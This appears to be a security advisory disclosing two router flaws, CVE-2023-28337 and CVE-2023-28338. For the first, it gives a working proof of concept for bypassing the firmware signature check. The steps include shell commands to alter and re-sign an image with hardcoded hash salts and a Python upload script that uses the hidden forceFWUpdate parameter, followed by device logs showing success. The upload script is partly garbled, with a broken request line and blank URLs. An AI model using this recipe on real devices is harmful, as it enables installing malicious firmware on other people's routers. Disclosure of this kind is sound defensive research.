Bypass Firmware Upgrade Signature Checks (Post-Auth) - CVE-2023-28337
When uploading a firmware image to the device for updates, a hidden “forceFWUpdate” parameter may be provided to force the upgrade to complete and bypass certain validation checks. End users can use this to upload modified, unofficial, and potentially malicious firmware to the device.
As a proof of concept, we downloaded firmware V1.0.9.92_1, and modified it to read as V9.9.9.99_9 by running the following command:
sed -i -e "s/V1.0.9.92_1/V9.9.9.99_9/g" ./RAX30.img
Next, we stripped the header value to obtain the raw image, in this case, it is 76 bytes long. We also use the hardcoded values used when creating the firmware signature.
dd if=./RAX30.img of=image bs=1 skip=76
dd if=./RAX30.img of=header bs=1 count=76
dd if=./header of=header_without_hash bs=1 skip=36
echo -n hr89sdfgjkehx > sha_head
echo -n nohsli9fjh3f > sha_tail
Generate the required hash by combining the relevant data.
# cat sha_head header_without_hash image sha_tail > modified_image
# openssl dgst -sha256 modified_image
Update the header with the above hash value and re-attach it to "image." The firmware will now see this as a properly signed firmware image.
The following PoC was used to demonstrate the successful upload:
import requests
burp0_url = ""
burp0_cookies = {"session": "72RmsEzn78dq4IrBXCBOWxbP8bGmo1kl"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Origin": "", "Authorization": "Basic YWRtaW46TGFicGFzczEyMyE=", "Connection": "close", "Referer": ""}
files = {"mtenFWUpload": open("upload_image.img", "rb")}, headers=burp0_headers, cookies=burp0_cookies, files=files)
Logs from the router show successful upload.
CGI_DEBUG> cgi_main.c:427: Enter CGI...
CGI_DEBUG> cgi_main.c:293: pData->pBoundryStr="676f250848d2deaec8af8b22701d2f38"
CGI_DEBUG> cgi_main.c:453: env.reqUri /cgi-bin/rex_cgi
CGI_DEBUG> cgi_main.c:454: env.pSetQueryString (null)
CGI_DEBUG> cgi_main.c:455: env.pGetQueryString function=forceFWUpdate&csrftoken=1391963467
CGI_DEBUG> cgi_main.c:467: process upload file
CGI_DEBUG> cgi_upload.c:1165: content_len=67936077 upload_type=1
rm: can't remove '/tmp/fw/guiCheck': No such file or directory
CGI_DEBUG> cgi_upload.c:597: content_len=67936077 upload_type=1
CGI_DEBUG> cgi_upload.c:612: start boundary=>--676f250848d2deaec8af8b22701d2f38
CGI_DEBUG> cgi_upload.c:645: filename "upload_image.img"
CGI_ERROR> cgi_upload.c:666: imageSizeEst = 67936043
CGI_DEBUG> cgi_upload.c:673: http: stat uboot env /proc/environment/single_image using single image
CGI_DEBUG> cgi_upload.c:703: upload start with len = 131072
CGI_DEBUG> cgi_upload.c:705: httpd: allocating 131072 byte buffer to hold image segment.
CGI_DEBUG> cgi_upload.c:713: 131072 bytes allocated for image data at 0xb6677018
CGI_DEBUG> cgi_upload.c:714: httpd: memory allocated.
CGI_DEBUG> cgi_upload.c:888: Found sign header, new validImageBlockSize 130996
CGI_DEBUG> cgi_upload.c:889: cur_ver=V1.0.9.92_1, new_ver=V9.9.9.99_9
CGI_DEBUG> cgi_upload.c:947: 262144 bytes allocated for image data at 0xb6535018
CGI_DEBUG> cgi_upload.c:948: httpd: memory allocated.
CGI_DEBUG> cgi_upload.c:377: got rc=0 after 67935957 bytes
CGI_DEBUG> cgi_upload.c:800: fgetc got EOF after 171733 bytes
CGI_DEBUG> cgi_upload.c:816: searching for boundary =>--676f250848d2deaec8af8b22701d2f38
CGI_DEBUG> cgi_upload.c:820: found end boundary
CGI_DEBUG> cgi_upload.c:834: find boundary validImageBlockSize 171693, imageSizeAcc 67935841
CGI_DEBUG> cgi_upload.c:957: final image imageSizeAcc=67935841, result=0
File Upload Denial of Service - CVE-2023-28338
Any request send to the device's web service containing a “Content-Type” of “multipartboundary=” will result in the request body being written to “/tmp/mulipartFile” on the device itself. A sufficiently large file will cause device resources to be exhausted, resulting in the device becoming unusable until it is rebooted.